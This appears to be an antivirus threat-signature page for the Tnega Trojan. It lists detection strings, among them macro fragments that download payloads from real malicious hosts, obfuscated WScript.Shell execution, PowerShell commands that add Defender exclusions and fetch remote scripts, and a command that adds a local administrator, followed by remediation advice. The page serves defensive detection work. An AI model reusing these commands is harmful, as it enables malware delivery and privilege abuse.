Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Tnega
Trojan:Win32/Tnega!MSR is a sophisticated Trojan that likely leverages malicious macros within documents to initiate its infection chain. It executes commands via WScript.Shell, downloads additional payloads from various remote URLs, and establishes persistence by dropping disguised executable files like "wsdts.db" or "onenote.db" into legitimate-looking user profile directories, aiming to compromise the system.
Relevant strings associated with this threat:
- https://cdn.jsd (PEHSTR_EXT)
- gh/i87924hgHd (PEHSTR_EXT)
- y/bboxfu<', 'that3.e (PEHSTR_EXT)
- CreateObject("WScript.Shell") (MACROHSTR_EXT)
- //smartscreentestratings2.net/ (MACROHSTR_EXT)
- .exe (MACROHSTR_EXT)
- https: (MACROHSTR_EXT)
- .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
- .exe" (MACROHSTR_EXT)
- CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
- Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
- = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
- dllPath = workDir & "\" & binName (MACROHSTR_EXT)
- binName = "wsdts.db (MACROHSTR_EXT)
- = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
- = curDocName & " .docx" (MACROHSTR_EXT)
- workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
- dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
- Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
- Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
- Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
- .Open "get", strURL (MACROHSTR_EXT)
- + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
- = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
- "WScript." + "She" + "ll" (MACROHSTR_EXT)
- + "." + "v" (MACROHSTR_EXT)
- GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
- .CreateElement("base64") (MACROHSTR_EXT)
- ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
- , ".") - 1) (MACROHSTR_EXT)
- CreateObject("Word.Application") (MACROHSTR_EXT)
- viebobpspa_autologon_admin.bat (PEHSTR_EXT)
- autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
- net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
- C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
- System.Runtime.InteropServices (PEHSTR_EXT)
- System.Runtime.CompilerServices (PEHSTR_EXT)
- System.Resources (PEHSTR_EXT)
- CowsAndBulls.GameForm.resources (PEHSTR_EXT)
- CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
- CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
- CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
- cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
- ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
- 4S;/M (SNID)
- ApplyRequest.dll (PEHSTR)
- ScriptDDL (PEHSTR)
- _lstStatusExec (PEHSTR)
- _reqScript (PEHSTR)
- ExecuteAllSteps (PEHSTR)
- SendProgressExec (PEHSTR)
- GerarScriptsDrop (PEHSTR)
- GetListReplaceDll (PEHSTR)
- lblcomputadorresponsavel (PEHSTR)
- DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
- RESUTILS.dll (PEHSTR)
- RPCRT4.dll (PEHSTR)
- wsnmp32.dll (PEHSTR)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR)
- sqlite3.dll (PEHSTR)
- /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
- _acmdln (PEHSTR)
- __p__commode (PEHSTR)
- /uke3 (SNID)
- 99`\, (SNID)
- TankGame.My.Resources (PEHSTR_EXT)
- TankGame.Game.resources (PEHSTR_EXT)
- TankGame.MainForm.resources (PEHSTR_EXT)
- TankGame.StartUp.resources (PEHSTR_EXT)
- TankGame.Resources.resources (PEHSTR_EXT)
- TankGame.MultipleBlocks.resources (PEHSTR_EXT)
- TankGame.InGameOptions.resources (PEHSTR_EXT)
- TankGame.QuickStart.resources (PEHSTR_EXT)
- C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
- _acmdln (PEHSTR_EXT)
- __p__commode (PEHSTR_EXT)
- sqlite3.dll (PEHSTR_EXT)
- \VersionIndependentProgID (PEHSTR_EXT)
- DefenderCSP.dll (PEHSTR_EXT)
- 3yD`. (SNID)
- bcrypt.dll (PEHSTR_EXT)
- zeeLog.txt (PEHSTR_EXT)
- Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
- file.dat (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- Task24Main.pdb (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- CellManager.g.resources (PEHSTR_EXT)
- CellManager.exe (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- XRails.Controls (PEHSTR_EXT)
- TwiceSlicePanel.UI (PEHSTR_EXT)
- Client.Connection (PEHSTR_EXT)
- \7AAAAAAAAAAAAAA (PEHSTR_EXT)
- ppphhyf.exe (PEHSTR_EXT)
- dKO:. (SNID)
- Oc\p! (SNID)
- powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
- report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
- http://sornx.xyz (PEHSTR_EXT)
- myip.php (PEHSTR_EXT)
- addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
- addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
- Cadave.pdb (PEHSTR_EXT)
- Top1Mu.Net (PEHSTR_EXT)
- Data/Logo/System.pro (PEHSTR_EXT)
- Release\Main.pdb (PEHSTR_EXT)
- OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
- $I3\$ (PEHSTR_EXT)
- https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
- D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
- OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
- CenterToScreen (PEHSTR_EXT)
- SetThreadExecutionState (PEHSTR_EXT)
- @Uj/<[]t (SNID)
- MtgKERNEL32.dll (PEHSTR_EXT)
- DonWS2_32.dll (PEHSTR_EXT)
- Zu8K{. (SNID)
- www.Yanjie.com (PEHSTR_EXT)
- http://101.35.18.254/444.exe (PEHSTR_EXT)
- \111.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- C:\ProgramData\444.exe (PEHSTR_EXT)
- ShellExecute (PEHSTR_EXT)
- D$,lExe (PEHSTR_EXT)
- q</2nK*>De!'7p/V (PEHSTR_EXT)
- JoinDomain.exe (PEHSTR_EXT)
- Software\ASProtect\Key (PEHSTR_EXT)
- aspr_keys.ini (PEHSTR_EXT)
- WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
- powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
- DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
- /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
- 3<$1<$3<$\ (PEHSTR_EXT)
- Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
- tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
- +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
- InitializeComponent (PEHSTR_EXT)
- quanlykho.Properties (PEHSTR_EXT)
- textbin.net/raw/ (PEHSTR_EXT)
- cmdvrt64 (PEHSTR_EXT)
- ogd368hc.dll (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)47439044a81b96be0bb34e544da881a393a30f0272616f52f54405b4bf288c7cImmediately isolate the affected system, perform a full system scan with updated antivirus software to remove all detected malicious files, and investigate for any persistence mechanisms or additional dropped payloads. If extensive compromise is suspected, consider system restoration from a trusted backup.